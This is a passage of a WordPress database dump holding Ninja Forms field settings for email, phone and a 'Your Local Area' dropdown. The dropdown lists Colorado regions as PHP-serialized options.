57,'show_help','0','show_help','0'),(1808,57,'help_text','','help_text',''),(1809,57,'calc_auto_include','0','calc_auto_include','0'),(1810,57,'calc_option','0','calc_option','0'),(1811,57,'placeholder','','placeholder',''),(1812,57,'disable_input','0','disable_input','0'),(1813,57,'input_limit','','input_limit',''),(1814,57,'input_limit_type','char','input_limit_type','char'),(1815,57,'input_limit_msg','','input_limit_msg',''),(1816,57,'user_state','0','user_state','0'),(1817,57,'autocomplete_off','0','autocomplete_off','0'),(1818,57,'num_sort','0','num_sort','0'),(1819,57,'admin_label','','admin_label',''),(1820,57,'user_info_field_group_name','','user_info_field_group_name',''),(1821,57,'user_info_field_group_custom','','user_info_field_group_custom',''),(1822,57,'show_desc','0','show_desc','0'),(1823,57,'desc_pos','none','desc_pos','none'),(1824,57,'desc_text','','desc_text',''),(1825,57,'element_class','','element_class',''),(1826,57,'required','1','required','1'),(1827,57,'key','email_96','key','email_96'),(1828,57,'default','','default',''),(1829,57,'container_class','one-half first','container_class','one-half first'),(1830,57,'custom_name_attribute','email','custom_name_attribute','email'),(1831,57,'personally_identifiable','1','personally_identifiable','1'),(1832,57,'parent_id','6','parent_id','6'),(1833,58,'objectType','Field','objectType','Field'),(1834,58,'objectDomain','fields','objectDomain','fields'),(1835,58,'editActive','','editActive',''),(1836,58,'order','5','order','5'),(1837,58,'type','phone','type','phone'),(1838,58,'def_id','15','def_id','15'),(1839,58,'label','Phone','label','Phone'),(1840,58,'label_pos','above','label_pos','above'),(1841,58,'mask','(999) 999-9999','mask','(999) 999-9999'),(1842,58,'datepicker','0','datepicker','0'),(1843,58,'first_name','0','first_name','0'),(1844,58,'last_name','0','last_name','0'),(1845,58,'from_name','0','from_name','0'),(1846,58,'user_address_1','0','user_address_1','0'),(1847,58,'user_address_2','0','user_address_2','0'),(1848,58,'user_city','0','user_city','0'),(1849,58,'user_zip','0','user_zip','0'),(1850,58,'user_email','0','user_email','0'),(1851,58,'user_info_field_group','1','user_info_field_group','1'),(1852,58,'show_help','0','show_help','0'),(1853,58,'help_text','','help_text',''),(1854,58,'calc_auto_include','0','calc_auto_include','0'),(1855,58,'calc_option','0','calc_option','0'),(1856,58,'placeholder','','placeholder',''),(1857,58,'disable_input','0','disable_input','0'),(1858,58,'input_limit','','input_limit',''),(1859,58,'input_limit_type','char','input_limit_type','char'),(1860,58,'input_limit_msg','','input_limit_msg',''),(1861,58,'user_state','0','user_state','0'),(1862,58,'autocomplete_off','0','autocomplete_off','0'),(1863,58,'num_sort','0','num_sort','0'),(1864,58,'admin_label','','admin_label',''),(1865,58,'user_info_field_group_name','','user_info_field_group_name',''),(1866,58,'user_info_field_group_custom','','user_info_field_group_custom',''),(1867,58,'show_desc','0','show_desc','0'),(1868,58,'desc_pos','none','desc_pos','none'),(1869,58,'desc_text','','desc_text',''),(1870,58,'element_class','','element_class',''),(1871,58,'required','1','required','1'),(1872,58,'key','phone_97','key','phone_97'),(1873,58,'default','','default',''),(1874,58,'container_class','one-half','container_class','one-half'),(1875,58,'manual_key','','manual_key',''),(1876,58,'custom_mask','','custom_mask',''),(1877,58,'custom_name_attribute','phone','custom_name_attribute','phone'),(1878,58,'personally_identifiable','1','personally_identifiable','1'),(1879,58,'parent_id','6','parent_id','6'),(1880,59,'objectType','Field','objectType','Field'),(1881,59,'objectDomain','fields','objectDomain','fields'),(1882,59,'editActive','','editActive',''),(1883,59,'order','6','order','6'),(1884,59,'type','listselect','type','listselect'),(1885,59,'label','Your Local Area','label','Your Local Area'),(1886,59,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1887,59,'label_pos','above','label_pos','above'),(1888,59,'list_type','dropdown','list_type','dropdown'),(1889,59,'multi_size','5','multi_size','5'),(1890,59,'list_show_value','1','list_show_value','1'),(1891,59,'list','a:0:{}','list','a:0:{}'),(1892,59,'user_info_field_group','','user_info_field_group',''),(1893,59,'calc_auto_include','0','calc_auto_include','0'),(1894,59,'user_state','0','user_state','0'),(1895,59,'num_sort','0','num_sort','0'),(1896,59,'admin_label','','admin_label',''),(1897,59,'show_help','0','show_help','0'),(1898,59,'help_text','','help_text',''),(1899,59,'show_desc','0','show_desc','0'),(1900,59,'desc_pos','none','desc_pos','none'),(1901,59,'desc_text','','desc_text',''),(1902,59,'element_class','','element_class',''),(1903,59,'required','1','required','1'),(1904,59,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 